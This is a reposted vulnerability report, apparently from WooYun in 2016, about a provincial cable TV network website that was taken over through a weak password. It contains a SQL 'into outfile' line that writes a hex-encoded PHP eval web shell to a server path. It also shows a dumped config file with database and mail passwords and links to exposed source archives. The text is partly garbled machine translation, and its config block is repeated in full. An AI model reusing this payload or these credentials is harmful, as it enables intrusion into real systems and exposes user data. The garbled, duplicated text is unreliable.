某省广电网络某站点弱口令导致getshell(影响近万用户信息)
漏洞标题 某省广电网络某站点弱口令导致getshell(影响近万用户信息) 相关厂商 湖北广电网络 漏洞作者 路人甲 提交时间 2016-04-21 21:40 公开时间 2016-06-09 16:…
Failure when receiving data from the peer
选择0x3C3F70687020406576616C28245F504F53545B27636D64275D293B3F3E进入outfile'/home/wwwroot/default/gdyxv2/aa.php'cmd
得到了壳
$ _config ['db'] ['host']='**。**。**。**';
$ _config ['db'] ['user']='gdyx';
$ _config ['db'] ['pass']='123456';
$ _config ['db'] ['char']='utf8';
$ _config ['db'] ['pconnect']=0;
$ _config ['db'] ['name']='gdyxt';
$ _config ['db'] ['prev']='gd_';
$ _config ['web'] ['title']='武汉广播电视电缆';
$ _config ['web'] ['seotitle']='武汉广播电视电缆';
$ _config ['web'] ['keywords']='';
$ _config ['web'] ['description']='武汉广播电视电缆';
$ _config ['mail'] ['server']='**。**。**。**';
$ _config ['mail'] ['port']=25;
$ _config ['mail'] ['user']='dwzhanglong@**.**.**.**';
$ _config ['mail'] ['password']='123456';
$ _config ['mail'] ['delimiter']=1;
$ _config ['mail'] ['mailusername']='KF265';
$ _config ['mail'] ['adminemail']='dwzhanglong@**.**.**.**';
微信公众账号信息,留言,不发布
最后,最后,附上两个
http://**。**。**。**/ibh/.svn/entries
http://www。**。**。**。**/ibh.zip
修理计划:
更改密码
版权声明:请注明出处。居民A @乌云
$ _config ['db'] ['host']='**。**。**。**';
$ _config ['db'] ['user']='gdyx';
$ _config ['db'] ['pass']='123456';
$ _config ['db'] ['char']='utf8';
$ _config ['db'] ['pconnect']=0;
$ _config ['db'] ['name']='gdyxt';
$ _config ['db'] ['prev']='gd_';
$ _config ['web'] ['title']='武汉广播电视电缆';
$ _config ['web'] ['seotitle']='武汉广播电视电缆';
$ _config ['web'] ['keywords']='';
$ _config ['web'] ['description']='武汉广播电视电缆';
$ _config ['mail'] ['server']='**。**。**。**';
$ _config ['mail'] ['port']=25;
$ _config ['mail'] ['user']='dwzhanglong@**.**.**.**';
$ _config ['mail'] ['password']='123456';
$ _config ['mail'] ['delimiter']=1;
$ _config ['mail'] ['mailusername']='KF265';
$ _config ['mail'] ['adminemail']='dwzhanglong@**.**.**.**';
微信公众账号信息,留言,不发布
最后,最后,附上两个
http://**。**。**。**/ibh/.svn/entries
http://www。**。**。**。**/ibh.zip
修理计划:
更改密码
版权声明:请注明出处。居民A @乌云
- 发表于 2016-07-17 08:00
- 阅读 ( 544 )
- 分类:黑客技术
